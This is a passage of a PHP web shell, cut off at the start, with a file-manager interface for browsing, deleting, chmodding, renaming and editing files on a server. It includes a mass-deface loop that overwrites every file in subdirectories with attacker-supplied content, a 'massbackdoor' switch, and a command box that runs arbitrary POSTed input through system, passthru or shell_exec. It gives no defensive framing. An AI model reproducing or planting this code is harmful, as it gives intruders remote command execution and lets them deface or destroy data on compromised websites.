        if($dir != "." && $dir != ".." && @filetype ($dir) == "dir"){
        //$indx = getcwd ()."/".$dir."/".$file;
        $scandir = scandir(getcwd()."/".$dir);
        foreach(array_unique($scandir) as $file){
        if(!is_file(getcwd()."/".$dir."/".$file)) continue;
        $indx = getcwd ()."/".$dir."/".$file;
        if (file_put_contents($indx, $_POST['index'])){

        echo "<hr color='lime'>>> <font color='lime'>$indx    </font><font color='lime'>(✓)</font>";
                }
                }
                }
                
}
}
}
if(isset($_GET["massbackdoor"])){
echo $notavail;
}else{
?>
<div id="content"><table width="800" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>[+] Files/Folder [+]</SCA></center></td>
<td><center>[+] Size [+]</SCA></center></td>
<td><center>[+] Permission [+]</peller></center></td>
<td><center>[+] Modify [+]</SCA></center></td>
</tr><tr>
	
<?php
$pathback = dirname("?path=$path"). PHP_EOL;
echo "<tr><td><a href='$pathback'>..</a></td><center><td><center>--</center></td>
<td><center>--</center></td>
<td><center><form method='post'><input type='hidden' name='path' value='$path'><input type='hidden' name='newf' value='file'><input type='submit' value='NewFile'></form>
<form method='post'><input type='hidden' name='path' value='$path'>
<input type='hidden' name='newf' value='folder'><input type='submit' value='NewDirectory'>
</form></center></td>
</tr>";

foreach(array_unique($scandir) as $dir){
if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
$size = filesize($path.'/'.$dir)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
//echo $size;
}
echo '
<td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
<center>';
if(is_writable($path.'/'.$dir)) echo '<font color="red" size="2">';
elseif(!is_readable($path.'/'.$dir)) echo '<font color="white" size="2">';
//echo perms($path.'/'.$dir);
if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';

echo'
<td><center><font color="white">--</font></center></td>';
$fpermi = substr(sprintf('%o', fileperms("$path/$file")), -4);
echo"
<td><center><font color='yellow'>$fpermi</font></center></td>
";
echo'
<td><center>
<form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value=""> Menu </option>
<option value="delete">[+] Delete [+]</option>
<option value="chmod">[+] Chmod [+]</option>
<option value="rename">[+] Rename [+]</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="chmodper" value="'.$fpermi.'">
<input type="hidden" name="name" value="'.$dir.'">
<input type="hidden" name="path" value="'.$path.'/'.$dir.'">
<input type="submit" value=">>">
</form>
</center></td><tr>';
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach(array_unique($scandir) as $file){
if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
//echo $size;
}

echo '<tr>
<td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
<td><center>'.$size.'</center></td>

';
$fpermi = substr(sprintf('%o', fileperms("$path/$file")), -4);
echo"
<td><center><font color='yellow'>$fpermi</font></center></td>
";
echo'<td><center>
<form method="POST" action="?option&path='.$path.'">
<select name="opt">
<option value=""> Menu </option>
<option value="delete">[+] Delete [+]</option>
<option value="chmod">[+] Chmod [+]</option>
<option value="rename">[+] Rename [+]</option>
<option value="edit">[+] Edit [+]</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="chmodper" value="'.$fpermi.'">
<input type="hidden" name="name" value="'.$file.'">
<input type="hidden" name="path" value="'.$path.'/'.$file.'">
<input type="submit" value=">>">
</form>
</center></td><tr>';
 
 echo "<div class='cmd-div'>";
if(!empty($_POST['cmd'])){
	 $cmd = $_POST['cmd'];
	if(function_exists("system")){
	system($cmd);
	}elseif(function_exists("passthru")){
	passthru($cmd);
	}elseif(function_exists("shell_exec")){
	shell_exec($cmd);
	}
	$status = "Executed!";
}
if(!empty($b)){
echo "<div class='cmd-div'>";
foreach($b as $v){
if(!empty($v)){
echo "<pre>"; 
echo "<p>$v</p>";
}else{
}
}
echo "</div>";
}}}
?>
<?php
}else{echo $login;}

?>